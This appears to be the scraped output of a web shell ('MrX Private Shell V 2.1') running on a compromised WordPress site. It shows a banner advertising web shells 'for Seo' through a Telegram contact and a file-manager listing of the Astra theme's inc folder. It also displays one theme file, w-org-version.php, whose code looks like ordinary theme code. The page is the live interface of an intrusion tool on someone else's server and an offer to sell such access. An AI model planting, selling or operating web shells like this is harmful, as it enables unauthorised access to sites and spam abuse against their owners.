__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php
/**
* This file ensures that it is w.org Astra theme.
*
* @package Astra
* @since Astra 4.8.4
*/
/**
* Function to filter input of Custom Layout's code editor.
*
* @param string $output Output.
* @param string $key Key.
* @return string
* @since 4.8.4
*/
function astra_default_filter_input( $output, $key ) {
return filter_input( INPUT_POST, $key, FILTER_DEFAULT ); // phpcs:ignore WordPressVIPMinimum.Security.PHPFilterFunctions.RestrictedFilter -- Default filter after all other cases, Keeping this filter for backward compatibility.
}
add_filter( 'astra_php_default_filter_input', 'astra_default_filter_input', 10, 2 );
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| addons | Folder | 0750 |
|
|
| assets | Folder | 0750 |
|
|
| blog | Folder | 0750 |
|
|
| builder | Folder | 0750 |
|
|
| compatibility | Folder | 0750 |
|
|
| core | Folder | 0750 |
|
|
| customizer | Folder | 0750 |
|
|
| dynamic-css | Folder | 0750 |
|
|
| lib | Folder | 0750 |
|
|
| metabox | Folder | 0750 |
|
|
| modules | Folder | 0750 |
|
|
| schema | Folder | 0750 |
|
|
| theme-update | Folder | 0750 |
|
|
| admin-functions.php | File | 1.62 KB | 0640 |
|
| class-astra-after-setup-theme.php | File | 11.02 KB | 0640 |
|
| class-astra-dynamic-css.php | File | 297.98 KB | 0640 |
|
| class-astra-extended-base-dynamic-css.php | File | 6.43 KB | 0640 |
|
| class-astra-global-palette.php | File | 13.89 KB | 0640 |
|
| class-astra-loop.php | File | 7.2 KB | 0640 |
|
| class-astra-mobile-header.php | File | 5.81 KB | 0640 |
|
| extras.php | File | 44.19 KB | 0640 |
|
| google-fonts.php | File | 189.03 KB | 0640 |
|
| index.php | File | 111 B | 0640 |
|
| markup-extras.php | File | 72.12 KB | 0640 |
|
| template-parts.php | File | 9.52 KB | 0640 |
|
| template-tags.php | File | 1.11 KB | 0640 |
|
| w-org-version.php | File | 647 B | 0640 |
|
| widgets.php | File | 4.32 KB | 0640 |
|